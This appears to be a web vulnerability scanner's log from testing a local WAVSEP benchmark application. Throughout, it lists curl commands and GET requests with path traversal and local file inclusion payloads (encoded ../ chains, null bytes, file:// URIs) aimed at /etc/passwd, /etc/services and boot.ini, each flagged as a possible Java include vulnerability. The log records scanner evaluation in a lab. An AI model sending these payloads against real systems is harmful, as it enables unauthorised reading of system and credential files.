curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
